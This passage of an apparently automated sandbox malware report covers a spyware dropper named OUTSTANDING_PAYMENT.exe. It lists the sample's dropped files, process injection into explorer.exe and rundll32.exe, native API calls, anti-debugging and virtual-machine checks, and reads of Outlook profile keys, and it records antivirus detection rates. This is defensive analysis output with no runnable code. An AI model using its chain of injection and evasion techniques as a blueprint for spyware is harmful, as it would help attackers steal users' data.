          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004217CD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004017D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00421FDC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0040BFEE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0040BFF3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00C5279E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129F900
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0136E824
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01351002
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013620A8
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012AB090
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013628EC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01362B28
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012CEBB0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135DBD2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013503DA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013622AE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01290D20
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01362D07
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01361D55
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013625DD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A841F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135D466
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 0129B150 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 00C52193 appears 44 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 00C52D64 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E613 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E6C3 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E743 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E7F3 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E73D NtClose,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E7ED NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D95F0 NtQueryInformationFile,
          Source: OUTSTANDING_PAYMENT.exeReversingLabs: Detection: 71%
          Source: OUTSTANDING_PAYMENT.exeVirustotal: Detection: 72%
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile read: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeJump to behavior
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | File created: C:\Users\user\AppData\Local\Temp\nsmF14E.tmp
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@26/12
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: OUTSTANDING_PAYMENT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: qhcqh.exe, 00000001.00000003.259638663.000000001A710000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000001.00000003.253388114.000000001A580000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: qhcqh.exe, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C52DA9 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F44E2 push E4DD4FA3h; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F49A2 pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00406066 push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00409120 push ss; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0041B2DF push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00421286 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0040F3BA pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00401DE0 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004105B5 push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00401635 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0041B682 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00410E9F push cs; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00408F17 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0040F726 push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00C52DA9 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012ED0D1 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C56A26 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | File created: C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\explorer.exe TID: 1328 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1280 | Thread sleep count: 60 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1280 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01365BA5 rdtsc
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 885
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 870
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | API coverage: 5.8 %
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F30FA GetSystemInfo,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000003.00000002.790142809.000000000F270000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWSt%SystemRoot%\system32\mswsock.dlls\StoreBadgeLogo.pngU
          Source: explorer.exe, 00000003.00000003.476355979.000000000F7D4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.670095974.0000000007166000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.475538694.0000000009054000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000003.00000002.777751246.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\wshqos.dll,-103a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000003.00000003.670660288.00000000050C2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000003.00000000.276570847.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: explorer.exe, 00000003.00000003.475538694.0000000009054000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.266462070.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C56A26 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C5A330 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01365BA5 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F2A5E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F2A29 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F2A9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F297F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_013241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01364015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01364015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]
